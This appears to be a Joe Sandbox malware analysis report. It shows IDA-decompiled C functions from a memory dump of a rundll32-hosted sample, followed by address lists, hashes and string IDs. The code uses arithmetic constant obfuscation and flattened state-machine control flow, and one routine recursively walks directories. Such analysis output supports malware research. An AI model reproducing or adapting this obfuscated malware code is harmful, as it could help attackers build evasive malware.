                                                                                                                          				_v2604 = 0x1fac8b;
                                                                                                                          				_v2604 = _v2604 + 0x9962;
                                                                                                                          				_v2604 = _v2604 ^ 0x0029d956;
                                                                                                                          				_v2696 = 0x3d46b4;
                                                                                                                          				_v2696 = _v2696 | 0x3d7fd3ff;
                                                                                                                          				_v2696 = _v2696 ^ 0x3d7bd02d;
                                                                                                                          				_v2720 = 0xad1695;
                                                                                                                          				_t426 = 9;
                                                                                                                          				_v2720 = _v2720 * 0x4b;
                                                                                                                          				_v2720 = _v2720 >> 0x10;
                                                                                                                          				_v2720 = _v2720 << 0xe;
                                                                                                                          				_v2720 = _v2720 ^ 0x0cab1f79;
                                                                                                                          				_v2644 = 0xe14118;
                                                                                                                          				_v2644 = _v2644 ^ 0x82369820;
                                                                                                                          				_v2644 = _v2644 ^ 0x82de8a4e;
                                                                                                                          				_v2668 = 0x391c30;
                                                                                                                          				_v2668 = _v2668 >> 7;
                                                                                                                          				_v2668 = _v2668 + 0xffff3589;
                                                                                                                          				_v2668 = _v2668 ^ 0xfff6d862;
                                                                                                                          				_v2692 = 0x9dbc3;
                                                                                                                          				_v2692 = _v2692 << 8;
                                                                                                                          				_v2692 = _v2692 * 0x75;
                                                                                                                          				_v2692 = _v2692 ^ 0x81749ad9;
                                                                                                                          				_v2660 = 0x144a46;
                                                                                                                          				_v2660 = _v2660 >> 0xd;
                                                                                                                          				_v2660 = _v2660 ^ 0x0008b8c7;
                                                                                                                          				_v2752 = 0x703c03;
                                                                                                                          				_v2752 = _v2752 * 0x74;
                                                                                                                          				_v2752 = _v2752 ^ 0x2e54cb21;
                                                                                                                          				_v2752 = _v2752 | 0x6f17e683;
                                                                                                                          				_v2752 = _v2752 ^ 0x7f96e2f0;
                                                                                                                          				_v2676 = 0xa438e5;
                                                                                                                          				_v2676 = _v2676 / _t426;
                                                                                                                          				_v2676 = _v2676 + 0x92ff;
                                                                                                                          				_v2676 = _v2676 ^ 0x0015b827;
                                                                                                                          				_v2612 = 0x1c48b9;
                                                                                                                          				_t427 = 0x1a;
                                                                                                                          				_v2612 = _v2612 / _t427;
                                                                                                                          				_v2612 = _v2612 ^ 0x000154fb;
                                                                                                                          				_v2628 = 0x490198;
                                                                                                                          				_v2628 = _v2628 | 0x561f6486;
                                                                                                                          				_v2628 = _v2628 ^ 0x565ec1b9;
                                                                                                                          				_v2616 = 0xcec4ed;
                                                                                                                          				_t428 = 0x3d;
                                                                                                                          				_v2616 = _v2616 * 9;
                                                                                                                          				_v2616 = _v2616 ^ 0x074f393e;
                                                                                                                          				_v2636 = 0x4be85b;
                                                                                                                          				_v2636 = _v2636 >> 1;
                                                                                                                          				_v2636 = _v2636 ^ 0x002afd34;
                                                                                                                          				_v2728 = 0xca47ed;
                                                                                                                          				_v2728 = _v2728 << 1;
                                                                                                                          				_v2728 = _v2728 / _t428;
                                                                                                                          				_v2728 = _v2728 >> 3;
                                                                                                                          				_v2728 = _v2728 ^ 0x00084593;
                                                                                                                          				_v2620 = 0x793301;
                                                                                                                          				_v2620 = _v2620 | 0xccc0d5da;
                                                                                                                          				_v2620 = _v2620 ^ 0xccf56683;
                                                                                                                          				_v2684 = 0xd6c9e7;
                                                                                                                          				_v2684 = _v2684 >> 8;
                                                                                                                          				_v2684 = _v2684 + 0x30fc;
                                                                                                                          				_v2684 = _v2684 ^ 0x000dbf27;
                                                                                                                          				_v2656 = 0x6cf887;
                                                                                                                          				_v2656 = _v2656 | 0x54469415;
                                                                                                                          				_v2656 = _v2656 ^ 0x5469dd96;
                                                                                                                          				_v2712 = 0x1ba43e;
                                                                                                                          				_v2712 = _v2712 + 0xffff54b6;
                                                                                                                          				_v2712 = _v2712 >> 0x10;
                                                                                                                          				_v2712 = _v2712 ^ 0x536d0b9d;
                                                                                                                          				_v2712 = _v2712 ^ 0x5368fd88;
                                                                                                                          				_v2744 = 0x7fa81e;
                                                                                                                          				_v2744 = _v2744 + 0x45dd;
                                                                                                                          				_v2744 = _v2744 | 0xcc5c3b14;
                                                                                                                          				_t429 = 0x76;
                                                                                                                          				_v2744 = _v2744 * 0x48;
                                                                                                                          				_v2744 = _v2744 ^ 0x83f6fb81;
                                                                                                                          				_v2704 = 0x73cce1;
                                                                                                                          				_v2704 = _v2704 >> 6;
                                                                                                                          				_v2704 = _v2704 | 0x0e0742c3;
                                                                                                                          				_v2704 = _v2704 ^ 0x0e0521c8;
                                                                                                                          				_v2764 = 0x3737a7;
                                                                                                                          				_v2764 = _v2764 >> 0xb;
                                                                                                                          				_v2764 = _v2764 << 3;
                                                                                                                          				_v2764 = _v2764 + 0x14ac;
                                                                                                                          				_v2764 = _v2764 ^ 0x0004654a;
                                                                                                                          				_v2772 = 0xaeb57f;
                                                                                                                          				_v2772 = _v2772 / _t429;
                                                                                                                          				_v2772 = _v2772 << 0xf;
                                                                                                                          				_t430 = 0x37;
                                                                                                                          				_v2772 = _v2772 / _t430;
                                                                                                                          				_v2772 = _v2772 ^ 0x037ee988;
                                                                                                                          				_v2648 = 0x954498;
                                                                                                                          				_t431 = 0x4b;
                                                                                                                          				_v2648 = _v2648 / _t431;
                                                                                                                          				_v2648 = _v2648 ^ 0x00054dec;
                                                                                                                          				_v2640 = 0x8be41e;
                                                                                                                          				_v2640 = _v2640 >> 0xd;
                                                                                                                          				_v2640 = _v2640 ^ 0x00089615;
                                                                                                                          				_v2748 = 0xfabe1b;
                                                                                                                          				_v2748 = _v2748 ^ 0xff42a680;
                                                                                                                          				_v2748 = _v2748 + 0xffff8ee7;
                                                                                                                          				_v2748 = _v2748 + 0x1c5a;
                                                                                                                          				_v2748 = _v2748 ^ 0xffbaa703;
                                                                                                                          				_v2756 = 0x33a01d;
                                                                                                                          				_v2756 = _v2756 * 0x6f;
                                                                                                                          				_v2756 = _v2756 << 4;
                                                                                                                          				_v2756 = _v2756 >> 4;
                                                                                                                          				_v2756 = _v2756 ^ 0x066d94da;
                                                                                                                          				_v2672 = 0x7cb69f;
                                                                                                                          				_v2672 = _v2672 << 4;
                                                                                                                          				_v2672 = _v2672 * 0x4a;
                                                                                                                          				_v2672 = _v2672 ^ 0x40c5c2d0;
                                                                                                                          				_v2680 = 0xc0e1f8;
                                                                                                                          				_v2680 = _v2680 << 1;
                                                                                                                          				_v2680 = _v2680 | 0xa5ca1830;
                                                                                                                          				_v2680 = _v2680 ^ 0xa5ca6401;
                                                                                                                          				_v2732 = 0xd52773;
                                                                                                                          				_v2732 = _v2732 ^ 0x8b84e9f5;
                                                                                                                          				_v2732 = _v2732 + 0xffffa58a;
                                                                                                                          				_v2732 = _v2732 >> 1;
                                                                                                                          				_v2732 = _v2732 ^ 0x45a69f9f;
                                                                                                                          				_v2740 = 0x525c84;
                                                                                                                          				_v2740 = _v2740 * 0x45;
                                                                                                                          				_v2740 = _v2740 << 0xd;
                                                                                                                          				_v2740 = _v2740 + 0xffffe485;
                                                                                                                          				_v2740 = _v2740 ^ 0x5df42895;
                                                                                                                          				_v2688 = 0x8afd1b;
                                                                                                                          				_v2688 = _v2688 >> 0xa;
                                                                                                                          				_v2688 = _v2688 * 0x44;
                                                                                                                          				_v2688 = _v2688 ^ 0x000c822b;
                                                                                                                          				_v2632 = 0xb6ec99;
                                                                                                                          				_v2632 = _v2632 + 0xffff2a9a;
                                                                                                                          				_v2632 = _v2632 ^ 0x00b1db1a;
                                                                                                                          				_v2664 = 0xfa37e2;
                                                                                                                          				_v2664 = _v2664 * 0x4c;
                                                                                                                          				_v2664 = _v2664 + 0x9251;
                                                                                                                          				_v2664 = _v2664 ^ 0x4a4e0c53;
                                                                                                                          				_v2708 = 0xf9311d;
                                                                                                                          				_v2708 = _v2708 >> 2;
                                                                                                                          				_t406 = _v2708 * 0x30;
                                                                                                                          				_v2708 = _t406;
                                                                                                                          				_v2708 = _v2708 + 0xffffde46;
                                                                                                                          				_v2708 = _v2708 ^ 0x0bad021b;
                                                                                                                          				_v2624 = 0x51d14;
                                                                                                                          				_v2624 = _v2624 | 0x271919e8;
                                                                                                                          				_v2624 = _v2624 ^ 0x2716653c;
                                                                                                                          				_v2716 = 0x708eea;
                                                                                                                          				_v2716 = _v2716 + 0xfffff8d8;
                                                                                                                          				_v2716 = _v2716 | 0x4ca3cf3c;
                                                                                                                          				_v2716 = _v2716 ^ 0x396f5f4d;
                                                                                                                          				_v2716 = _v2716 ^ 0x7599e4cd;
                                                                                                                          				_v2724 = 0x3acc77;
                                                                                                                          				_v2724 = _v2724 + 0x56d;
                                                                                                                          				_v2724 = _v2724 + 0xb0bb;
                                                                                                                          				_v2724 = _v2724 + 0xffffce89;
                                                                                                                          				_v2724 = _v2724 ^ 0x003c4612;
                                                                                                                          				while(_t468 != 0x5de06da) {
                                                                                                                          					if(_t468 == 0xea1969c) {
                                                                                                                          						_t468 = 0xfa9128f;
                                                                                                                          						continue;
                                                                                                                          					} else {
                                                                                                                          						_t480 = _t468 - 0xfa9128f;
                                                                                                                          						if(_t468 != 0xfa9128f) {
                                                                                                                          							L8:
                                                                                                                          							__eflags = _t468 - 0xa8e801c;
                                                                                                                          							if(__eflags != 0) {
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							E007ADA22(_v2652, _v2608, _t480, _v2736,  &_v2600, _t431, _v2768);
                                                                                                                          							 *((short*)(E0079B6CF( &_v2600, _v2760, _v2604, _v2696))) = 0;
                                                                                                                          							E00798969(_v2720,  &_v1560, _t480, _v2644, _v2668);
                                                                                                                          							_push(_v2752);
                                                                                                                          							_push(_v2660);
                                                                                                                          							E007947CE( &_v2600, _v2676, _v2692, _v2612, _v2628, E007ADCF7(_v2692, 0x791308, _t480),  &_v1560, _v2616, _v2636);
                                                                                                                          							E0079A8B0(_v2728, _t419, _v2620);
                                                                                                                          							_t431 = _v2684;
                                                                                                                          							_t406 = E0079EA99(_v2684, _t467, _v2656, _v2712,  &_v2080, _v2744);
                                                                                                                          							_t472 =  &(_t472[0x17]);
                                                                                                                          							if(_t406 != 0) {
                                                                                                                          								_t468 = 0x5de06da;
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					return _t406;
                                                                                                                          				}
                                                                                                                          				_push(_v2648);
                                                                                                                          				_push(_v2700);
                                                                                                                          				_push(_v2772);
                                                                                                                          				_push( &_v1040);
                                                                                                                          				E007A46BB(_v2704, _v2764);
                                                                                                                          				_push(_v2756);
                                                                                                                          				_push(_v2748);
                                                                                                                          				E007947CE( &_v1040, _v2672, _v2640, _v2680, _v2732, E007ADCF7(_v2640, 0x7913b8, __eflags),  &_v2080, _v2740, _v2688);
                                                                                                                          				_t435 = _v2632;
                                                                                                                          				E0079A8B0(_t435, _t409, _v2664);
                                                                                                                          				__eflags = 0;
                                                                                                                          				_push(_v2724);
                                                                                                                          				_push(0);
                                                                                                                          				_push(_t435);
                                                                                                                          				_push(0);
                                                                                                                          				_push(0);
                                                                                                                          				_push(_v2716);
                                                                                                                          				_t431 = _v2708;
                                                                                                                          				_push( &_v520);
                                                                                                                          				_t406 = E0079AB87(_v2708, _v2624, 0);
                                                                                                                          				_t472 = _t472 - 0xc + 0x64;
                                                                                                                          				_t468 = 0xa8e801c;
                                                                                                                          				goto L8;
                                                                                                                          			}

                                                                                                                          0x007a12f9
                                                                                                                          0x007a1301
                                                                                                                          0x007a1309
                                                                                                                          0x007a1311
                                                                                                                          0x007a1319
                                                                                                                          0x007a1321
                                                                                                                          0x007a1325
                                                                                                                          0x007a132d
                                                                                                                          0x007a133a
                                                                                                                          0x007a133e
                                                                                                                          0x007a1343
                                                                                                                          0x007a134b
                                                                                                                          0x007a1353
                                                                                                                          0x007a135b
                                                                                                                          0x007a1365
                                                                                                                          0x007a1369
                                                                                                                          0x007a1371
                                                                                                                          0x007a137c
                                                                                                                          0x007a1387
                                                                                                                          0x007a1392
                                                                                                                          0x007a139f
                                                                                                                          0x007a13a3
                                                                                                                          0x007a13ab
                                                                                                                          0x007a13b3
                                                                                                                          0x007a13bb
                                                                                                                          0x007a13c0
                                                                                                                          0x007a13c5
                                                                                                                          0x007a13c9
                                                                                                                          0x007a13d1
                                                                                                                          0x007a13d9
                                                                                                                          0x007a13e4
                                                                                                                          0x007a13ef
                                                                                                                          0x007a13fa
                                                                                                                          0x007a1402
                                                                                                                          0x007a140a
                                                                                                                          0x007a1412
                                                                                                                          0x007a141a
                                                                                                                          0x007a1422
                                                                                                                          0x007a142a
                                                                                                                          0x007a1432
                                                                                                                          0x007a143a
                                                                                                                          0x007a1442
                                                                                                                          0x007a144a
                                                                                                                          0x007a1458
                                                                                                                          0x007a1572
                                                                                                                          0x00000000
                                                                                                                          0x007a145e
                                                                                                                          0x007a145e
                                                                                                                          0x007a1460
                                                                                                                          0x007a163b
                                                                                                                          0x007a163b
                                                                                                                          0x007a1641
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007a1466
                                                                                                                          0x007a1485
                                                                                                                          0x007a14bc
                                                                                                                          0x007a14c3
                                                                                                                          0x007a14c8
                                                                                                                          0x007a14d1
                                                                                                                          0x007a1524
                                                                                                                          0x007a1536
                                                                                                                          0x007a1554
                                                                                                                          0x007a155b
                                                                                                                          0x007a1560
                                                                                                                          0x007a1565
                                                                                                                          0x007a156b
                                                                                                                          0x00000000
                                                                                                                          0x007a156b
                                                                                                                          0x007a1565
                                                                                                                          0x007a1460
                                                                                                                          0x007a1651
                                                                                                                          0x007a1651
                                                                                                                          0x007a1579
                                                                                                                          0x007a1587
                                                                                                                          0x007a158b
                                                                                                                          0x007a159a
                                                                                                                          0x007a159b
                                                                                                                          0x007a15a0
                                                                                                                          0x007a15a9
                                                                                                                          0x007a15f0
                                                                                                                          0x007a15fc
                                                                                                                          0x007a1605
                                                                                                                          0x007a160d
                                                                                                                          0x007a160f
                                                                                                                          0x007a1613
                                                                                                                          0x007a1614
                                                                                                                          0x007a1615
                                                                                                                          0x007a1616
                                                                                                                          0x007a1617
                                                                                                                          0x007a1629
                                                                                                                          0x007a162d
                                                                                                                          0x007a162e
                                                                                                                          0x007a1633
                                                                                                                          0x007a1636
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Fo$M_o9$[K
                                                                                                                          • API String ID: 0-3743190696
                                                                                                                          • Opcode ID: e193d30f39921c03e9bed1d1b18969abdb5d2a4ad93057c4e7227f725354ac9e
                                                                                                                          • Instruction ID: 2e05843772c3809d5b079dfcfc2540eb52bf64f662b12e6a50e51c71035f01a2
                                                                                                                          • Opcode Fuzzy Hash: e193d30f39921c03e9bed1d1b18969abdb5d2a4ad93057c4e7227f725354ac9e
                                                                                                                          • Instruction Fuzzy Hash: B2121EB1409381CFD368CF21C58AA9BBBF1FBC5708F508A1DE59A96260D7B58909CF53
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 80%
                                                                                                                          			E00799DCF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
                                                                                                                          				signed int _v8;
                                                                                                                          				signed int _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				signed int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				signed int _v60;
                                                                                                                          				signed int _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				signed int _v72;
                                                                                                                          				signed int _v76;
                                                                                                                          				signed int _v80;
                                                                                                                          				signed int _v84;
                                                                                                                          				signed int _v88;
                                                                                                                          				signed int _v92;
                                                                                                                          				signed int _v96;
                                                                                                                          				signed int _v100;
                                                                                                                          				signed int _v104;
                                                                                                                          				signed int _v108;
                                                                                                                          				signed int _v112;
                                                                                                                          				signed int _v116;
                                                                                                                          				signed int _v120;
                                                                                                                          				signed int _v124;
                                                                                                                          				intOrPtr _v136;
                                                                                                                          				char _v160;
                                                                                                                          				short _v708;
                                                                                                                          				short _v710;
                                                                                                                          				char _v712;
                                                                                                                          				signed int _v756;
                                                                                                                          				char _v1276;
                                                                                                                          				char _v1796;
                                                                                                                          				void* _t278;
                                                                                                                          				signed int _t306;
                                                                                                                          				signed int _t310;
                                                                                                                          				void* _t312;
                                                                                                                          				intOrPtr _t317;
                                                                                                                          				void* _t319;
                                                                                                                          				signed int _t324;
                                                                                                                          				void* _t327;
                                                                                                                          				void* _t353;
                                                                                                                          				signed int _t365;
                                                                                                                          				signed int _t366;
                                                                                                                          				signed int _t367;
                                                                                                                          				signed int _t368;
                                                                                                                          				signed int _t369;
                                                                                                                          				signed int _t370;
                                                                                                                          				void* _t373;
                                                                                                                          				void* _t374;
                                                                                                                          
                                                                                                                          				_t317 = _a12;
                                                                                                                          				_push(_a24);
                                                                                                                          				_push(_a20);
                                                                                                                          				_push(_a16);
                                                                                                                          				_push(_t317);
                                                                                                                          				_push(_a8);
                                                                                                                          				_push(_a4);
                                                                                                                          				_push(__edx);
                                                                                                                          				_push(__ecx);
                                                                                                                          				E007A20B9(_t278);
                                                                                                                          				_v44 = 0x411c30;
                                                                                                                          				_t374 = _t373 + 0x20;
                                                                                                                          				_v44 = _v44 ^ 0x3aebcc2b;
                                                                                                                          				_v44 = _v44 ^ 0x10090153;
                                                                                                                          				_t319 = 0x338c922;
                                                                                                                          				_v44 = _v44 ^ 0x2aa3d158;
                                                                                                                          				_v56 = 0xa7c140;
                                                                                                                          				_v56 = _v56 >> 1;
                                                                                                                          				_v56 = _v56 ^ 0xbf613798;
                                                                                                                          				_v56 = _v56 ^ 0xbf3c535c;
                                                                                                                          				_v88 = 0xb7ebf9;
                                                                                                                          				_t365 = 0x52;
                                                                                                                          				_v88 = _v88 / _t365;
                                                                                                                          				_v88 = _v88 ^ 0x0004e01e;
                                                                                                                          				_v112 = 0x1a3e5b;
                                                                                                                          				_v112 = _v112 + 0xd588;
                                                                                                                          				_v112 = _v112 ^ 0x0012c9bc;
                                                                                                                          				_v8 = 0x55b84a;
                                                                                                                          				_t366 = 0x72;
                                                                                                                          				_v8 = _v8 * 0x74;
                                                                                                                          				_v8 = _v8 + 0xffff07de;
                                                                                                                          				_v8 = _v8 * 0x41;
                                                                                                                          				_v8 = _v8 ^ 0xdc74eedb;
                                                                                                                          				_v96 = 0x123c4e;
                                                                                                                          				_v96 = _v96 + 0x1d06;
                                                                                                                          				_v96 = _v96 ^ 0x001f978b;
                                                                                                                          				_v124 = 0x58f8d3;
                                                                                                                          				_v124 = _v124 * 0x2b;
                                                                                                                          				_v124 = _v124 ^ 0x0efbe47e;
                                                                                                                          				_v120 = 0x58d481;
                                                                                                                          				_v120 = _v120 << 5;
                                                                                                                          				_v120 = _v120 ^ 0x0b1fdd63;
                                                                                                                          				_v32 = 0x85548e;
                                                                                                                          				_v32 = _v32 / _t366;
                                                                                                                          				_v32 = _v32 * 0x2e;
                                                                                                                          				_v32 = _v32 ^ 0x0037cfdf;
                                                                                                                          				_v108 = 0x851b7a;
                                                                                                                          				_v108 = _v108 | 0xf3ff5f40;
                                                                                                                          				_v108 = _v108 ^ 0xf3fc1521;
                                                                                                                          				_v76 = 0x86d28f;
                                                                                                                          				_v76 = _v76 >> 0xd;
                                                                                                                          				_v76 = _v76 ^ 0x000a85f2;
                                                                                                                          				_v48 = 0x8a8988;
                                                                                                                          				_v48 = _v48 + 0xffff9d54;
                                                                                                                          				_v48 = _v48 + 0xffffb441;
                                                                                                                          				_v48 = _v48 ^ 0x008c2bbe;
                                                                                                                          				_v80 = 0x3fe2a4;
                                                                                                                          				_v80 = _v80 ^ 0x5e00b743;
                                                                                                                          				_v80 = _v80 ^ 0x5e39b1b0;
                                                                                                                          				_v116 = 0x4ea08b;
                                                                                                                          				_v116 = _v116 + 0xffffca32;
                                                                                                                          				_v116 = _v116 ^ 0x00427ef9;
                                                                                                                          				_v104 = 0xba6181;
                                                                                                                          				_v104 = _v104 + 0xf529;
                                                                                                                          				_v104 = _v104 ^ 0x00b33727;
                                                                                                                          				_v52 = 0x1e8210;
                                                                                                                          				_v52 = _v52 >> 8;
                                                                                                                          				_v52 = _v52 | 0xffb97487;
                                                                                                                          				_v52 = _v52 ^ 0xffb16a42;
                                                                                                                          				_v40 = 0xeabfd3;
                                                                                                                          				_v40 = _v40 ^ 0x26644279;
                                                                                                                          				_t367 = 0x3a;
                                                                                                                          				_v40 = _v40 / _t367;
                                                                                                                          				_v40 = _v40 ^ 0x00a36ea5;
                                                                                                                          				_v12 = 0xc9f67b;
                                                                                                                          				_v12 = _v12 + 0x836b;
                                                                                                                          				_v12 = _v12 | 0xa1408986;
                                                                                                                          				_t368 = 0x45;
                                                                                                                          				_v12 = _v12 * 0x75;
                                                                                                                          				_v12 = _v12 ^ 0xf1cc1c9a;
                                                                                                                          				_v36 = 0x1f6921;
                                                                                                                          				_v36 = _v36 ^ 0x9bf749ed;
                                                                                                                          				_v36 = _v36 / _t368;
                                                                                                                          				_v36 = _v36 ^ 0x024ed910;
                                                                                                                          				_v64 = 0x37ccf2;
                                                                                                                          				_v64 = _v64 + 0xfffff775;
                                                                                                                          				_t369 = 0x19;
                                                                                                                          				_v64 = _v64 * 0x24;
                                                                                                                          				_v64 = _v64 ^ 0x07d7b77b;
                                                                                                                          				_v28 = 0x370f8;
                                                                                                                          				_v28 = _v28 << 0xd;
                                                                                                                          				_v28 = _v28 + 0x6470;
                                                                                                                          				_v28 = _v28 >> 1;
                                                                                                                          				_v28 = _v28 ^ 0x37097055;
                                                                                                                          				_v20 = 0x84152c;
                                                                                                                          				_v20 = _v20 * 0x7e;
                                                                                                                          				_v20 = _v20 / _t369;
                                                                                                                          				_v20 = _v20 << 0xe;
                                                                                                                          				_v20 = _v20 ^ 0x6c90d6a3;
                                                                                                                          				_v60 = 0x687dd9;
                                                                                                                          				_t370 = 0xc;
                                                                                                                          				_v60 = _v60 * 0x1d;
                                                                                                                          				_v60 = _v60 << 7;
                                                                                                                          				_v60 = _v60 ^ 0xeb212648;
                                                                                                                          				_v84 = 0xd09924;
                                                                                                                          				_v84 = _v84 * 0x7c;
                                                                                                                          				_v84 = _v84 ^ 0x650614c5;
                                                                                                                          				_v100 = 0x3804f2;
                                                                                                                          				_v100 = _v100 | 0x9eb8052c;
                                                                                                                          				_v100 = _v100 ^ 0x9eb506d7;
                                                                                                                          				_v92 = 0xf492b0;
                                                                                                                          				_v92 = _v92 + 0xffffc4ae;
                                                                                                                          				_v92 = _v92 ^ 0x00fafa5e;
                                                                                                                          				_v16 = 0xd0e41e;
                                                                                                                          				_v16 = _v16 * 0x3d;
                                                                                                                          				_v16 = _v16 >> 0xd;
                                                                                                                          				_v16 = _v16 >> 0xe;
                                                                                                                          				_v16 = _v16 ^ 0x000dc1c9;
                                                                                                                          				_v24 = 0x66d2fe;
                                                                                                                          				_v24 = _v24 / _t370;
                                                                                                                          				_v24 = _v24 + 0xffffccd2;
                                                                                                                          				_v24 = _v24 ^ 0x0a93dd72;
                                                                                                                          				_v24 = _v24 ^ 0x0a9c564f;
                                                                                                                          				_v72 = 0xbcf4e;
                                                                                                                          				_v72 = _v72 >> 7;
                                                                                                                          				_v72 = _v72 ^ 0x000c8ddf;
                                                                                                                          				_t364 = _v72;
                                                                                                                          				_v68 = 0x4616df;
                                                                                                                          				_v68 = _v68 + 0x9c8e;
                                                                                                                          				_v68 = _v68 + 0xaaef;
                                                                                                                          				_v68 = _v68 ^ 0x004c065d;
                                                                                                                          				while(1) {
                                                                                                                          					L1:
                                                                                                                          					_t353 = 0x2e;
                                                                                                                          					L2:
                                                                                                                          					while(_t319 != 0x21229d9) {
                                                                                                                          						if(_t319 == 0x338c922) {
                                                                                                                          							_v136 = _t317;
                                                                                                                          							_t319 = 0x9035918;
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          						if(_t319 == 0x5b964d8) {
                                                                                                                          							__eflags = _v756 & _v44;
                                                                                                                          							if(__eflags == 0) {
                                                                                                                          								_t306 = _a16( &_v756,  &_v160);
                                                                                                                          								asm("sbb ecx, ecx");
                                                                                                                          								_t324 =  ~_t306 & 0x09c7cc54;
                                                                                                                          								L9:
                                                                                                                          								_t319 = _t324 + 0x21229d9;
                                                                                                                          								while(1) {
                                                                                                                          									L1:
                                                                                                                          									_t353 = 0x2e;
                                                                                                                          									goto L2;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							__eflags = _v712 - _t353;
                                                                                                                          							if(_v712 != _t353) {
                                                                                                                          								L19:
                                                                                                                          								__eflags = _a24;
                                                                                                                          								if(__eflags != 0) {
                                                                                                                          									_push(_v104);
                                                                                                                          									_push(_v116);
                                                                                                                          									_t312 = E007ADCF7(_v80, 0x7917a0, __eflags);
                                                                                                                          									_pop(_t327);
                                                                                                                          									E007947CE(_t317, _v52, _t327, _v40, _v12, _t312,  &_v712, _v36, _v64);
                                                                                                                          									E00799DCF(_v28, _v20, _v60, _a8,  &_v1276, _a16, _v84, _a24);
                                                                                                                          									_t310 = E0079A8B0(_v100, _t312, _v92);
                                                                                                                          									_t374 = _t374 + 0x3c;
                                                                                                                          									_t353 = 0x2e;
                                                                                                                          								}
                                                                                                                          								L18:
                                                                                                                          								_t319 = 0xbd9f62d;
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          							__eflags = _v710;
                                                                                                                          							if(__eflags == 0) {
                                                                                                                          								goto L18;
                                                                                                                          							}
                                                                                                                          							__eflags = _v710 - _t353;
                                                                                                                          							if(_v710 != _t353) {
                                                                                                                          								goto L19;
                                                                                                                          							}
                                                                                                                          							__eflags = _v708;
                                                                                                                          							if(__eflags != 0) {
                                                                                                                          								goto L19;
                                                                                                                          							}
                                                                                                                          							goto L18;
                                                                                                                          						}
                                                                                                                          						if(_t319 == 0x9035918) {
                                                                                                                          							_push(_v112);
                                                                                                                          							_push(_v88);
                                                                                                                          							E0079A918(_t317, __eflags, _v8, _v96, E007ADCF7(_v56, 0x791770, __eflags), _v124,  &_v1796);
                                                                                                                          							_t374 = _t374 + 0x1c;
                                                                                                                          							_t310 = E0079A8B0(_v120, _t307, _v32);
                                                                                                                          							_t319 = 0xb066d4a;
                                                                                                                          							while(1) {
                                                                                                                          								L1:
                                                                                                                          								_t353 = 0x2e;
                                                                                                                          								goto L2;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						if(_t319 == 0xb066d4a) {
                                                                                                                          							_t310 = E00797E00(_v108,  &_v756, _v76, _v48,  &_v1796);
                                                                                                                          							_t364 = _t310;
                                                                                                                          							_t374 = _t374 + 0xc;
                                                                                                                          							__eflags = _t310 - 0xffffffff;
                                                                                                                          							if(__eflags == 0) {
                                                                                                                          								L25:
                                                                                                                          								return _t310;
                                                                                                                          							}
                                                                                                                          							_t319 = 0x5b964d8;
                                                                                                                          							goto L1;
                                                                                                                          						}
                                                                                                                          						if(_t319 != 0xbd9f62d) {
                                                                                                                          							L24:
                                                                                                                          							__eflags = _t319 - 0xa89df2;
                                                                                                                          							if(__eflags != 0) {
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          							goto L25;
                                                                                                                          						}
                                                                                                                          						_t310 = E00794635(_v16,  &_v756, _t364, _v24);
                                                                                                                          						asm("sbb ecx, ecx");
                                                                                                                          						_t324 =  ~_t310 & 0x03a73aff;
                                                                                                                          						goto L9;
                                                                                                                          					}
                                                                                                                          					E00798ABF(_t364, _v72, _v68);
                                                                                                                          					_t319 = 0xa89df2;
                                                                                                                          					_t353 = 0x2e;
                                                                                                                          					goto L24;
                                                                                                                          				}
                                                                                                                          			}

                                                                                                                          0x00799ed8
                                                                                                                          0x00799edb
                                                                                                                          0x00799ee2
                                                                                                                          0x00799ee9
                                                                                                                          0x00799ef0
                                                                                                                          0x00799ef7
                                                                                                                          0x00799efe
                                                                                                                          0x00799f02
                                                                                                                          0x00799f09
                                                                                                                          0x00799f10
                                                                                                                          0x00799f17
                                                                                                                          0x00799f1e
                                                                                                                          0x00799f25
                                                                                                                          0x00799f2c
                                                                                                                          0x00799f33
                                                                                                                          0x00799f3a
                                                                                                                          0x00799f41
                                                                                                                          0x00799f48
                                                                                                                          0x00799f4f
                                                                                                                          0x00799f56
                                                                                                                          0x00799f5d
                                                                                                                          0x00799f64
                                                                                                                          0x00799f6b
                                                                                                                          0x00799f71
                                                                                                                          0x00799f78
                                                                                                                          0x00799f7f
                                                                                                                          0x00799f86
                                                                                                                          0x00799f92
                                                                                                                          0x00799f97
                                                                                                                          0x00799f9c
                                                                                                                          0x00799fa3
                                                                                                                          0x00799faa
                                                                                                                          0x00799fb1
                                                                                                                          0x00799fbc
                                                                                                                          0x00799fbf
                                                                                                                          0x00799fc2
                                                                                                                          0x00799fc9
                                                                                                                          0x00799fd0
                                                                                                                          0x00799fde
                                                                                                                          0x00799fe1
                                                                                                                          0x00799fe8
                                                                                                                          0x00799fef
                                                                                                                          0x00799ffa
                                                                                                                          0x00799ffd
                                                                                                                          0x0079a000
